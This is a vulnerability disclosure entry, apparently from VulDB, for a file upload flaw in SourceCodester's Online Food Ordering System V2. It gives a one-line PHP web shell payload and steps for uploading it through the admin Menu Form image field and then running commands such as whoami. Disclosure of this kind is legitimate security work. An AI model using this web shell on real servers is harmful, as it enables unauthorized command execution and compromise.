| タイトル | Online Food Ordering System V2 - File Upload to OS Command Injection |
|---|
| 説明 | # Exploit Title: Online Food Ordering System V2 - File Upload to OS Command Injection
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Version: v2.0
# Tested on: Windows 11, Apache
Description:-
A File Upload Vulnerability which has been escalated to OS Command Injection in Online Food Ordering System V2 while uploading a .php file in "Menu Form" page.
`
Payload used:-
<?php system($_GET['c']); ?>
`
Parameter":-
Menu Form > Image: <?php system($_GET['c']); ?>
`
Steps to reproduce:-
1. Here we go to : http://localhost/fos/admin/index.php?page=menu
2. Now in those Parameters "Image" here we upload a php file
3. In that we put our payload "<?php system($_GET['c']); ?>" and we name it as 1.php and upload it
4. As we open in another tab we need to put our endpoint "?c=" and we can see our OS Command Injection Attack
http://localhost/fos/assets/img/1673548800_PHP_exif_system.php?c=whoami |
|---|
| ユーザー | DisguisedRoot (UID 33702) |
|---|
| 送信 | 2023年01月12日 19:58 (3 年 ago) |
|---|
| モデレーション | 2023年01月12日 22:09 (2 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 218185 [SourceCodester Online Food Ordering System 2.0 Menu Form index.php?page=menu Image 特権昇格] |
|---|
| ポイント | 17 |
|---|